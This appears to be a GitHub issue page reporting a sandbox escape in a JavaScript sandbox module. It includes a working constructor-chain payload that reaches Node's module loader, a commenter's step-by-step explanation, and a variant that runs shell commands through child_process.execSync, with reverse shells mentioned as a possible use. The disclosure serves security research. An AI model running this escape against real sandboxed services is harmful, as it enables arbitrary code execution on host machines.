Sandbox can be broken.

Using functions and constructors, it's possible to escape the sandbox to get process, which can be used to get require, which can be used for evil things like a reverse shell.

Code:

    new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")

A, I hope, more readable version (because of how hacky the thing is, it's difficult):

    // Same payload as the one-liner, written with a template literal so the
    // outer Function body can span several lines.
    new Function(`
      return (
        this.constructor.constructor(
          'return (this.process.mainModule.constructor._load)'
        )()
      )
    `)()("util").inspect("hi")

Issue Analytics

  • State: open
  • Created 7 years ago
  • Reactions: 4
  • Comments: 18 (1 by maintainers)

Top GitHub Comments

gf3 commented, Jul 23, 2020 (4 reactions)

I've been playing with compiling a JavaScript engine to wasm, which seems to be a good way to execute JavaScript securely:

[screencast attachment]

and here’s the code example from the initial issue:

[screenshot attachment, 2020-07-23]

io4 commented, Nov 5, 2017 (4 reactions)

@sand1er the code does the following:

  • Escape the context by using constructors: because the objects still have constructors you can use to get out, and because the constructor of this is Object and the constructor of Object is Function, you can use that Function to make a function that runs in a new context that has the process variable.

  • Use the process variable to access a require-like function (process.mainModule's constructor is Module, which has _load, which can do similar things).

  • Import a module and run commands. The example just imports util and inspects "hi".

But you could run commands by replacing ("util").inspect("hi") with ("child_process").execSync("id"), for example (to run the command id).

You should think of new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")() as require.

I found a very similar thing in another major sandbox (sandcastle): https://github.com/bcoe/sandcastle/issues/70. Hopefully all the people who download this module don't use it for production or something. I basically ended up making my own sandbox... (which I don't want to advertise here)

Feel free to ask more questions if you don’t understand something.
